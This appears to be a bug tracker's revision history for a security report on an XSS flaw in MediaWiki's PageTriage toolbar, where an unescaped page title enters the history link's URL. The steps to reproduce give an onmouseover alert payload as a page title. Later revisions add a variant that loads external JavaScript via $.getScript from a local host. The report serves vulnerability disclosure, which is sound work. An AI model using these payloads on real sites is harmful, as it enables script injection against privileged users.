Change Details

The page title in the URL of the history link in the PageTriage toolbar is not URL encoded or escaped, allowing possible XSS. Steps to reproduce: # Create a page with the title: "onmouseover="alert(0);"" # With an account that can patrol pages, visit the page and open the info tab # Hover over the "show full history" link {F2525396}

The page title in the URL of the history link in the PageTriage toolbar is not URL encoded or escaped, allowing possible XSS. Steps to reproduce: # Create a page with the title: `"onmouseover="alert(0);""` (or create a title with a URL to external JS, i.e. `"onmouseover%3D"$.getScript('http://127.0.0.1/t.js')""`) # With an account that can patrol pages, visit the page and open the info tab # Hover over the "show full history" link {F2525396}

The page title in the URL of the history link in the PageTriage toolbar is not URL encoded or escaped, allowing possible XSS. Steps to reproduce: # Create a page with the title: "onmouseover="alert(0);""`"onmouseover="alert(0);""` (or create a title with a URL to external JS, i.e. `"onmouseover%3D"$.getScript('http://127.0.0.1/t.js')""`) # With an account that can patrol pages, visit the page and open the info tab # Hover over the "show full history" link {F2525396}